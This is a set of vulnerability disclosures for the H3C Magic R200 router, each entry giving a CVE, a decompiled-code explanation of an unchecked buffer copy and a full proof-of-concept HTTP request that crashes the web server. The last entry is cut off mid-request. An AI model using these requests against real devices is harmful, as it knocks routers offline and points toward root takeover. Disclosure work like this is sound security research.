H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the Edit_BasicSSID interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the Edit\_BasicSSID interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the Edit\_BasicSSID interface at /goform/aspForm. ## Vulnerability Details In function Edit\_BasicSSID, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v45 is 64 bytes long. in line 57, the content of Var is formatted into v45 without size check by sscanf function in the form of \`%\[^;\]\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/2LBQDtp.png) !\[\](https://i.imgur.com/o2fBFuD.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 536 CMD=Edit\_BasicSSID&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/ZGgxQ90.png) We can see process webs is crashed and restarted. !\[\](https://i.imgur.com/Ap2kSe4.png) And you can write your own exp to get the root shell.

CVE-2023-29906: H3C Magic R200 was discovered stack overflow via the Edit_BasicSSID interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateSnat interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the UpdateSnat interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateSnat interface at /goform/aspForm. ## Vulnerability Details In function UpdateSnat, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v14 is 64 bytes long. When the length of Var is less than 512 and larger than 64, in line 24, the content of Var is formatted into v14 by sscanf function in the form of \`%s\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/QVP8iPa.png) !\[\](https://i.imgur.com/jokv0qU.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 534 CMD=UpdateSnat&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/D5hCz0Z.png) And you can write your own exp to get the root shell.

CVE-2023-29905: H3C Magic R200 was discovered stack overflow via the UpdateSnat interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateWanParams interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the UpdateWanParams interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateWanParams interface at /goform/aspForm. ## Vulnerability Details In function UpdateWanParams, string Var is passed in by parameter 'param' . Local varible v58 is 64 bytes long. When the length of Var is less than 512 and larger than 64, in line 15, the content of Var is formatted into v58 by sscanf function in the form of \`%s\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/o1iiwTk.png) !\[\](https://i.imgur.com/pKwqQ5k.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Content-Length: 525 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: \*/\* Origin: http://192.168.124.1 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=; cur\_page=maintain\_logs.asp?refreshFlag=Tue%20Mar%2014%202023%2016:05:37%20GMT+0800%20(%D0%C2%BC%D3%C6%C2%B1%EA%D7%BC%CA%B1%BC%E4) Connection: close CMD=UpdateWanParams&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/DUajjuN.png) We can see process webs is crashed and restarted. !\[\](https://i.imgur.com/IRMiNbV.png) And you can write your own exp to get the root shell.

CVE-2023-29916: H3C Magic R200 was discovered stack overflow via the UpdateWanParams interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via go parameter at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via go parameter at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via go parameter at /goform/aspForm. ## Vulnerability Details The content obtained by the program through the go parameter is passed to v3, and then v3 is copied into \`&goHtmlUrl\`, the size of v3 is not checked, and there is a buffer overflow vulnerability. !\[\](https://i.imgur.com/cRikZfD.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 516 go=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/AaWIiXG.png) And you can write your own exp to get the root shell.

CVE-2023-29917: H3C Magic R200 was discovered stack overflow via go parameter at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateMacClone interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the UpdateMacClone interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateMacClone interface at /goform/aspForm. ## Vulnerability Details In function UpdateMacClone, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v15 is 64 bytes long. When the length of Var is less than 512 and larger than 64, in line 25, the content of Var is formatted into v15 by sscanf function in the form of \`%s\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/xgbkTHn.png) !\[\](https://i.imgur.com/JE4Nozu.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Content-Length: 524 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: \*/\* Origin: http://192.168.124.1 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=; cur\_page=maintain\_logs.asp?refreshFlag=Tue%20Mar%2014%202023%2016:05:37%20GMT+0800%20(%D0%C2%BC%D3%C6%C2%B1%EA%D7%BC%CA%B1%BC%E4) Connection: close CMD=UpdateMacClone&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/mbrGAKz.png) And you can write your own exp to get the root shell.

CVE-2023-29910: H3C Magic R200 was discovered stack overflow via the UpdateMacClone interface at /goform/aspForm - HackMD

H3C Magic R200 R200V100R004 was discovered to contain a stack overflow via the DelvsList interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the DelvsList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 R200V100R004 was discovered to contain a stack overflow via the DelvsList interface at /goform/aspForm. ## Vulnerability Details In function DelvsList,the size of local variable v6 is noly 16 bytes long.Parameters in the DelvsList interface use the getElement function to split strings(Var) and get items. !\[\](https://i.imgur.com/o43EsQb.png) !\[\](https://i.imgur.com/vv700yC.png) In line 28, the maximum size in the getElement function is limited to 64. When the length of input less than 64, the string will be copied into a1 by memcpy function. The size of the original array has been completely exceeded, resulting in a buffer overflow vulnerability. !\[\](https://i.imgur.com/5jTOUfB.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Content-Length: 321 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.124.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/dhcpd.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close CMD=DelvsList&GO=dhcpd.asp&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/wZ8HSuT.png) And you can write your own exp to get the root shell.

CVE-2023-29912: H3C Magic R200 was discovered stack overflow via the DelvsList interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the DeltriggerList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm. ## Vulnerability Details In function DeltriggerList,the size of local variable v7 is noly 16 bytes long.Parameters in the DeltriggerList interface use the getElement function to split strings(Var) and get items. !\[\](https://i.imgur.com/IJshUFq.png) !\[\](https://i.imgur.com/EJxYVPo.png) In line 28, the maximum size in the getElement function is limited to 64. When the length of input less than 64, the string will be copied into a1 by memcpy function. The size of the original array has been completely exceeded, resulting in a buffer overflow vulnerability. !\[\](https://i.imgur.com/5jTOUfB.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 282 CMD=DeltriggerList&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/71a3vWX.png) And you can write your own exp to get the root shell.

CVE-2023-29914: H3C Magic R200 was discovered stack overflow via the DeltriggerList interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the Edit_BasicSSID_5G interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the Edit\_BasicSSID\_5G interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the Edit\_BasicSSID\_5G interface at /goform/aspForm. ## Vulnerability Details In function Edit\_BasicSSID\_5G, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v44 is 64 bytes long. in line 53, the content of Var is formatted into v44 without size check by sscanf function in the form of \`%\[^;\]\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/m4O5A1I.png) !\[\](https://i.imgur.com/wCkUR3J.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 541 CMD=Edit\_BasicSSID\_5G&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/P2cIzcj.png) We can see process webs is crashed and restarted. !\[\](https://i.imgur.com/Ap2kSe4.png) And you can write your own exp to get the root shell.

CVE-2023-29907: H3C Magic R200 was discovered stack overflow via the Edit_BasicSSID_5G interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm. ## Vulnerability Details In function SetAPWifiorLedInfoById, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v17 is 72 bytes long. in line 26, the content of Var is formatted into v17 without size check by sscanf function in the form of \`%\[^;\]\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/NnWzUNq.png) !\[\](https://i.imgur.com/ht7j6Gs.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 544 CMD=SetAPWifiorLedInfoById&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/Ah3gEcu.png) We can see process webs is crashed and restarted. !\[\](https://i.imgur.com/nTphgnu.png) And you can write your own exp to get the root shell.

CVE-2023-29913: H3C Magic R200 was discovered stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the SetMobileAPInfoById interface at /goform/aspForm.

\# H3C Magic R200 was discovered stack overflow via the SetMobileAPInfoById interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R200\` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the SetMobileAPInfoById interface at /goform/aspForm. ## Vulnerability Details In function SetMobileAPInfoById, string Var is passed in by parameter 'param' without filtered and checking its length. Local varible v18 is 72 bytes long. in line 27, the content of Var is formatted into v18 without size check by sscanf function in the form of \`%\[^;\]\`, which leads to a stack overflow vulnerbility. !\[\](https://i.imgur.com/hX5CXwj.png) !\[\](https://i.imgur.com/IykSBzs.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/Gh5mBRc.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 541 